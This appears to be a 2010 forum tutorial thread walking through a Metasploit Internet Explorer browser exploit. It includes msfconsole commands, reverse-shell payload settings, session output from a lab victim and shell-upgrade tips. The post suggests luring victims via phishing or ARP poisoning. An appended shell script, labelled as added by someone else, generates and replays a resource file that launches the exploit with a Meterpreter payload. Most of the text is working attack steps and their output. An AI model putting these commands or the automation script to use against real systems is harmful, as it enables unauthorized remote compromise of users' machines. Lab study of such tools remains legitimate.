Thread: My Metasploit tutorial thread

  1. #1
    iproute (Senior Member; joined Jan 2010; Midwest, USA; 192 posts)

    My Metasploit tutorial thread

    For beginners, much of this stuff can be found in some good resources I will cite later. Please leave comments on things you'd like to see included or corrections that may need to be made. Currently this post is a work in progress.

    This demonstration uses the new "windows/browser/ms10_xxx_ie_css_clip" module.
    More info is available from Exploit-DB: New IE6,7,8 mem corruption


    Common msfconsole tasks:
    First, of course, open a terminal and issue the command
    Code:
    root@bt:~# msfconsole
    Then there are some basics like searching for exploits, getting a more detailed description of a given exploit from within the framework, selecting a payload, running the exploit, some of the simple automation that can be done, and other oddities. Here we will look for exploits that correspond to 2010 Microsoft security advisories.
    Code:
    search ms10
    Next, maybe we want to know more about a given exploit. This information looks similar to what is found in the advisories and maybe even on the Exploits Database by Offensive Security, but includes things like the options that can be set.
    Code:
    info windows/browser/ms10_xxx_ie_css_clip
    Now we will load up an exploit we'd like to try.
    Code:
    use windows/browser/ms10_xxx_ie_css_clip
    We need to configure our exploit options for it to work, of course. I like to select payloads first. Not all payloads work with all exploits. To keep things simple, the Metasploit developers have designed the framework so that once you have selected the exploit you would like to use, if you issue the command below (show payloads) the framework will only show the payloads that work for your selected exploit.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > show payloads
    Remember the info command we used with exploits? Well it works with payloads too. Take some time to familiarize yourself with the payloads metasploit has to offer.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > info windows/shell/reverse_tcp
    Let's go ahead and select a payload to use.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > set payload windows/shell/reverse_tcp
    Now we need to configure our options. Let's take a look at what options we have.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > show options
    OK, let's set things up!
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > set lhost 192.168.1.105
    msf exploit(ms10_xxx_ie_css_clip) > set lport 31337
    msf exploit(ms10_xxx_ie_css_clip) > set uripath /
    msf exploit(ms10_xxx_ie_css_clip) > set srvport 80
    The uripath option sets the directory where the malicious webserver will be located; the root directory keeps it simple. srvport sets the webserver port to 80, also making this vector simpler to perform. Please refer to other documentation for the other options, such as the excellent
    Metasploit Unleashed Information Security Training
    Here is where you might want to include some automation or set some of the other features. To view the advanced options available, issue the following command:
    Code:
    show advanced
    A couple of interesting advanced options are AutoRunScript and InitialAutoRunScript.
    Please refer to section 10 (Meterpreter scripting) of the MSF Unleashed course for more information on which scripts are available.
    Another way is to issue the following command in your terminal (not in the framework console):
    Code:
    root@bt:~# ls /pentest/exploits/framework3/scripts/meterpreter/
    arp_scanner.rb           enum_putty.rb            getcountermeasure.rb      multi_meter_inject.rb   remotewinenum.rb                 webcam.rb
    autoroute.rb             enum_shares.rb           getgui.rb                 multicommand.rb         scheduleme.rb                    win32-sshclient.rb
    checkvm.rb               enum_vmware.rb           gettelnet.rb              multiscript.rb          schtasksabuse.rb                 win32-sshserver.rb
    credcollect.rb           event_manager.rb         getvncpw.rb               netenum.rb              scraper.rb                       winbf.rb
    domain_list_gen.rb       file_collector.rb        hashdump.rb               packetrecorder.rb       screen_unlock.rb                 winenum.rb
    dumplinks.rb             get_application_list.rb  hostsedit.rb              panda_2007_pavsrv51.rb  search_dwld.rb                   wmic.rb
    duplicate.rb             get_env.rb               keylogrecorder.rb         persistence.rb          service_permissions_escalate.rb
    enum_chrome.rb           get_filezilla_creds.rb   killav.rb                 pml_driver_config.rb    srt_webdrive_priv.rb
    enum_firefox.rb          get_local_subnets.rb     metsvc.rb                 powerdump.rb            uploadexec.rb
    enum_logged_on_users.rb  get_loggedon_users.rb    migrate.rb                prefetchtool.rb         virtualbox_sysenter_dos.rb
    enum_powershell_env.rb   get_pidgin_creds.rb      multi_console_command.rb  process_memdump.rb      vnc.rb
    The two autorunscript options allow your session to perform scripted tasks as soon as the session begins. Things like making a meterpreter session persistent, or beginning a keylogger immediately, migrating your session to another process, or even chaining multiple commands are possible. You'll want to do some studying and experimenting with what automation you find works for you.
    Now we need to run our exploit. I like the -j option as it backgrounds the exploit process so you can continue to work in the framework console.
    Code:
    exploit -j
    Now find a creative way to lure your victim to your malicious website, since the exploit we've selected here is a client-side one. You could use ARP poisoning or a phishing-style attack with the link. Be inventive! I am just using a simple, not-updated Windows XP SP3 machine running on my LAN in VirtualBox, so I will just browse there myself. In my victim's web browser I simply entered my attacker's IP
    Code:
    http://192.168.1.105/
    Well, we got a session! Here is some output from my msfconsole
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > exploit -j
    [*] Exploit running as background job.
    
    [*] Started reverse handler on 192.168.1.105:31337 
    [*] Using URL: http://0.0.0.0:80/
    [*]  Local IP: http://192.168.1.105:80/
    [*] Server started.
    msf exploit(ms10_xxx_ie_css_clip) >[*] Sending Internet Explorer CSS SetUserClip Memory Corruption to 192.168.1.147:1053 (target: Internet Explorer 6)...
    [*] Sending stage (240 bytes) to 192.168.1.147
    [*] Command shell session 1 opened (192.168.1.105:31337 -> 192.168.1.147:1055) at 2010-11-14 11:34:44 -0600
    [*] Session ID 1 (192.168.1.105:31337 -> 192.168.1.147:1055) processing InitialAutoRunScript 'migrate -f'
    [-] Error: Command shell sessions do not support migration
    In this case we are using a simple reverse shell and not a Meterpreter. The migration error is OK, as migrate is a Meterpreter script. In some instances you may only be able to begin with a shell due to payload limitations an exploit has. No problem. Here is what I like to do.

    Turning windows shells into meterpreter sessions the easy way.
    First, let's list our sessions. Then we'll take a look at the options the sessions command has, since there is one we like a lot.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > sessions
    
    Active sessions
    ===============
    
      Id  Type   Information  Connection
      --  ----   -----------  ----------
      1   shell               192.168.1.105:31337 -> 192.168.1.147:1055
    
    msf exploit(ms10_xxx_ie_css_clip) > sessions -h
    Usage: sessions [options]
    
    Active session manipulation and interaction.
    
    OPTIONS:
    
        -K        Terminate all sessions
        -c <opt>  Run a command on the session given with -i, or all
        -d <opt>  Detach an interactive session
        -h        Help banner
        -i <opt>  Interact with the supplied session ID
        -k <opt>  Terminate session
        -l        List all active sessions
        -q        Quiet mode
        -s <opt>  Run a script on the session given with -i, or all
        -u <opt>  Upgrade a win32 shell to a meterpreter session
        -v        List verbose fields
    That -u option is pretty sweet. Let's go ahead and upgrade our shell to a Meterpreter. FYI, it did not work in this instance, possibly because the shell we are using is also a reverse connection. I will edit this thread later with the correct updates. Anyway, the upgrade-a-shell command is:
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > sessions -u 1
    EDIT: I didn't get the thread edited with the upgrade working, but I have made a video of using the spoolss exploit with a reverse shell payload, then upgraded that. I've also shown the makerc command, and the migrate meterpreter script. Migrate should be covered elsewhere and is a mostly simple concept. To understand when migrate is not simple, watch the megaprimer series.
    Makerc is useful as it will generate a Metasploit resource file (akin to a bash script for Metasploit, almost) of all the commands used in that session. Good automation tool. I will show using resource files later on; they are also covered in the MSF Unleashed course.
    m10_061_spoolss demo
    ...continued....
    Last edited by iproute; 11-16-2010 at 01:49 AM.
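    Added example (not from iproute's post or from the Metasploit project): a POSIX shell script that turns the whole sequence above (use, set payload, set LHOST/LPORT/SRVPORT/URIPATH, optional InitialAutoRunScript, exploit -j) into a resource file that msfconsole can replay with -r, the same kind of file makerc produces. The module name, option names and values are the ones from the post; the helper names (check_ipv4, check_port, build_rc), the output path and the RUN_MSF switch are my own assumptions. It also carries the two checks you would want before launching: LHOST must be a real IPv4 address and the ports sane, SRVPORT 80 needs root, and the migrate autorun script is only emitted for a Meterpreter payload, because on a plain shell session it just produces the "Command shell sessions do not support migration" error shown above.

```shell
#!/bin/sh
# Added example: generate a msfconsole resource file for the browser-exploit
# setup described in the post. Not code from the post or from Metasploit.
# Helper names, the output path and RUN_MSF are assumptions of this example.

# Validate a dotted-quad IPv4 address (what LHOST must be for a reverse handler).
check_ipv4() {
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for octet in $(echo "$1" | tr '.' ' '); do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Validate a TCP port number: digits only, 1..65535.
check_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# build_rc MODULE PAYLOAD LHOST LPORT SRVPORT URIPATH OUTFILE
# Writes a resource file reproducing the post's command sequence.
build_rc() {
    module=$1; payload=$2; lhost=$3; lport=$4; srvport=$5; uripath=$6; out=$7
    check_ipv4 "$lhost"   || { echo "bad LHOST: $lhost" >&2; return 1; }
    check_port "$lport"   || { echo "bad LPORT: $lport" >&2; return 1; }
    check_port "$srvport" || { echo "bad SRVPORT: $srvport" >&2; return 1; }
    # Binding SRVPORT 80 (as the post does) needs root; warn before msfconsole
    # has already started the reverse handler and then fails on the web server.
    if [ "$srvport" -lt 1024 ] && [ "$(id -u)" -ne 0 ]; then
        echo "warning: SRVPORT $srvport is privileged and you are not root" >&2
    fi
    {
        echo "use $module"
        echo "set PAYLOAD $payload"
        echo "set LHOST $lhost"
        echo "set LPORT $lport"
        echo "set SRVPORT $srvport"
        echo "set URIPATH $uripath"
        # migrate is a Meterpreter script; a command-shell session cannot run it,
        # so only emit the autorun line when the payload stages Meterpreter.
        case "$payload" in
            *meterpreter*) echo "set InitialAutoRunScript migrate -f" ;;
        esac
        echo "exploit -j"
    } > "$out"
}

# Stand-alone use: write the file for the post's setup and, if asked, replay it.
RC_FILE=${TMPDIR:-/tmp}/ie_css_clip.rc
build_rc windows/browser/ms10_xxx_ie_css_clip windows/meterpreter/reverse_tcp \
         192.168.1.105 31337 80 / "$RC_FILE"
if [ "${RUN_MSF:-0}" = 1 ] && command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$RC_FILE"
else
    echo "resource file written to $RC_FILE; replay with: msfconsole -q -r $RC_FILE"
fi
```

    Run it as root on the attacking box with RUN_MSF=1 to go straight into the backgrounded exploit job; without that variable it only writes the file so you can read it first. Swap windows/meterpreter/reverse_tcp for windows/shell/reverse_tcp and the InitialAutoRunScript line disappears, which is the difference that produced the migration error in the session output above.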
